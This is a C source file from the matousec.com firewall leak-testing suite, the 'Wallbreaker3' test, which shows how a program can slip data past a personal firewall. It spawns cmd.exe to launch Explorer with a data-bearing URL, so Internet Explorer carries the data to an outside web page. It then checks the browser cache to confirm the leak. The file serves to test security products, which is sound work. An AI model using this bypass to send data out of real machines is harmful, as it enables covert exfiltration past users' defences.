/*

 Security Software Testing Suite - Wallbreaker3 (leak-test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Credits:

   * Based on the original code and idea of Wallbreaker v4.0 - 3rd test, written by Guillaume Kaddouch,
     http://www.firewallleaktester.com/. Guillaume Kaddouch kindly provided us a part of the source code of Wallbreaker.


 Method description:

   * Execute "cmd.exe" with a special parameter, which executes Windows Explorer with a URL as a command line parameter
     so that Internet Explorer is executed. This URL parameter, which also contains the data to transmit,
     redirects Internet Explorer to the Internet webpage.

*/

#include <stdio.h>
#include <windows.h>
#include <wininet.h>
#include "include/common.h"
#include "include/common-leak.h"
#include "include/common-hook.h"


int main(int argc,char *argv[])
{
  COM_CONF conf;
  char *credits=" * Based on the original code and idea of Wallbreaker v4.0 - 3rd test, written by Guillaume Kaddouch\n"
                "   who kindly provided us a part of the source code of Wallbreaker.\n"
                "   http://www.firewallleaktester.com/\n";

  if (!com_console_init_main_with_credits("Wallbreaker3","wallbreaker3",argc,argv,&conf,COM_TEST_TYPE_WALLBREAKER3,credits)) return 1;

  char *used_dlls[]={"ntdll.dll","kernel32.dll"};
  if (!com_hook_load_libraries(used_dlls,2)) return 1;

  DeleteUrlCacheEntry(conf.uri);

  int res=FALSE;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;

  char cmdline[MAX_PATH+COM_INET_URI_MAX_LEN];

  snprintf(cmdline,sizeof(cmdline),"cmd.exe /C explorer.exe \"%s\"",conf.uri);
  cmdline[sizeof(cmdline)-1]='\0';

  STARTUPINFO si;
  memset(&si,0,sizeof(si));
  si.cb=sizeof(si);
  PROCESS_INFORMATION pi;

  if (CreateProcess(NULL,cmdline,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi))
  {
    if (com_verbosity_get()) printf("Windows console shell started.\n\n");

    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);

    char buffer[4096];
    res=com_attempt_check_ie_cache(buffer,sizeof(buffer),&conf,10000,&err_inf)
     && com_find_pattern_and_print_data(buffer,sizeof(buffer),&conf,&err_inf);

  } else com_err_set(&err_inf,"Unable to create child process with command line \"%s\".\n",cmdline);

  return com_end(res,&err_inf,&conf);
}
